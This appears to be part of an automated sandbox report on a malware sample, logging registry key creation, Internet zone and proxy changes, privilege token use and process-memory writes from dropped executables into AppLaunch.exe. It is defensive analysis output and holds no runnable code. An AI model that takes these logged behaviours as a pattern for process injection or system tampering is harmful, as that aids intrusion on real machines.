Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\powercfg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3912 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 3912 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 3912 wrote to memory of 4620 N/A C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe
PID 4620 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 4620 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 4620 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe
PID 2892 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2892 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2892 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2892 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2892 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2892 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2892 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2892 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2892 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4620 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe
PID 4620 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe
PID 4620 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe
PID 1808 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1808 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1808 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1808 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1808 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1808 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
